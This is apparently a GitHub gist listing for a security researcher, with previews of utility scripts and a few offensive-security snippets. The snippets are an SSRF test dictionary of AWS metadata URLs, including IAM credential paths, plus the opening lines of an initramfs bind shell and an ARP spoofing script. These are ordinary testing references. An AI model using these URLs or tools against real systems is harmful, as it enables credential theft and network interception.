Skip to content

Instantly share code, notes, and snippets.

Avatar

David Tomaschik Matir

View GitHub Profile
@Matir
Matir / create-debian-usb-key.sh
Created Nov 12, 2019 — forked from nmaupu/create-debian-usb-key.sh
Create Debian USB key automatic installation (preseed)
View create-debian-usb-key.sh
#!/usr/bin/env bash
set -e -x -o pipefail
DIRNAME="$(dirname $0)"
DISK="$1"
: "${DEBIAN_RELEASE:=stretch}"
: "${DEBIAN_VERSION:=9.2.1}"
: "${DEBIAN_MIRROR:=http://ftp.debian.org}"
@Matir
Matir / dhcproute.py
Created Sep 23, 2018
Compute strings for DHCP Option 121, Classless Routes
View dhcproute.py
import ipaddress
import math
import sys
def pack_address(addr):
"""Pack an IPv4 Address into colon-delimited format."""
return ':'.join('{:02x}'.format(c) for c in addr.packed)
@Matir
Matir / sok-renamer.py
Created Sep 20, 2018
Rename videos from SoK with Title of Talk
View sok-renamer.py
import sys
from lxml import html
import os
import os.path
import re
run = True
buf = open(sys.argv[1]).read()
doc = html.fromstring(buf[:])
@Matir
Matir / cloud_metadata.txt
Last active Jun 14, 2018 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Matir
Matir / initramfs_bind_2323.c
Created Jan 16, 2018
bind shell that works in initramfs
View initramfs_bind_2323.c
/* One-off background bind shell with chroot for initramfs. */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <stdio.h>
#define PORT 2323
@Matir
Matir / query.sh
Created Nov 5, 2017
Extracting the usernames of Chrome profiles using jq
View query.sh
jq '.profile.info_cache[]|.user_name' "${PROFILEDIR}/Local State"
@Matir
Matir / arpspoof.py
Created Jul 12, 2017
ARP Spoofing from Python with Scapy
View arpspoof.py
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@Matir
Matir / README.md
Last active Mar 8, 2017 — forked from ayosec/README.md
GDB commands to trace calls to malloc/free
View README.md

Attach to a running process with

  gdb -x trace-dyn-mem -p $PID

After every malloc the returned value (the allocated address) will be read from the RAX (64 bits) register.

After every free the last item in the backtrace (the free itself) will be shown. With the libc6-dbg package installed you can see the address passed as the first argument of free.

View keybase.md

Keybase proof

I hereby claim:

  • I am matir on github.
  • I am matir (https://keybase.io/matir) on keybase.
  • I have a public key whose fingerprint is 7FD5 8D9A 196D CEEE AD67 1F94 F4D7 A791 5DEA 789B

To claim this, I am signing this object:

@Matir
Matir / extensioninventory.py
Created Jan 31, 2014
Show permissions of chrome extensions
View extensioninventory.py
import json
import os
import sys
import re
_ACCESS_ALL = '**Access your data on all websites**'
PERMISSIONS = {
'plugins': 'Access all data on your computer and the websites you visit',